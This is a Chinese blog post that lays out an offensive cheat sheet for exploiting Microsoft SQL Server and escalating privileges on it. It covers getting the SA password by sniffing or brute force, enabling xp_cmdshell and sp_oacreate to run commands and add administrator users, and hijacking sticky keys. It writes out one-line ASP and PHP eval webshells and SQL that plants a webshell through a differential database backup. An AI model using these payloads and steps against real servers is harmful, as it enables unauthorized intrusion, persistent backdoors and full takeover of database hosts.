zoukankan      html  css  js  c++  java
  • MSSQL 漏洞利用与提权

    1、SA口令的获取

    webshell或源代码的获取

    源代码泄露

    嗅探(用CAIN等工具嗅探1433数据库端口)

    口令暴力破解

    2、常见SQL server 提权命令

    查看数据库的版本(select @@version;)

    查看数据库所在服务器操作系统的参数

    查看数据库启动的参数

    查看数据库启动的时间

    查看数据库服务器名和实例名

    查看用户登录信息

    查看数据库里所所有的存储工程和函数

    查看数据库里用户和进程的信息

    恢复存储过程

    开启和关闭xp_cmdshell

    xp_cmdshell执行命令

    开启和关闭sp_oacreate

    sp_oacreate删除文件

    sp_oacreate复制文件

    sp_oacreate移动文件

    sp_oacreate添加管理员用户

    开启和关闭sp_makeweblask

    wscript.shell执行命令

    shell.applocation执行命令

    开启和关闭openrowset

    沙盒执行命令

    注册表劫持粘贴键

    sp_oacreate替换粘贴键

    public提权操作

    echo一句话后门(echo  <%eval request(cmd)%> >d:wwwrootok.asp    echo  <? php @eval($_POST[cmd]);?> >cmd.php)

    在mssql 中查询password

    3、通过数据库备份获取webshell

    差异备份一句话木马

    backup database [当前数据库名] to disk = 'c: ecycler1.bak'

    create table cmd (a image);

    insert into cmd(a) values ('<%eval request("cmd")%>');

    backup database [当前数据库名] to disk = '网站绝对路径' WITH DIFFERENTIAL,FORMAT--

    LOG 备份一句话木马(......)

  • 相关阅读:
    Apache工作原理
    Mysql主从复制
    Apache 工作模式
    Codeforces 932E Team Work
    【TJOI2018】教科书般的亵渎
    Codeforces 960G Bandit Blues
    斯特林数&斯特林反演
    【BZOJ4916】神犇与蒟蒻
    【BZOJ3944】Sum
    【BZOJ4805】欧拉函数求和
  • 原文地址:https://www.cnblogs.com/linuxsec/p/10012624.html
Copyright © 2011-2022 走看看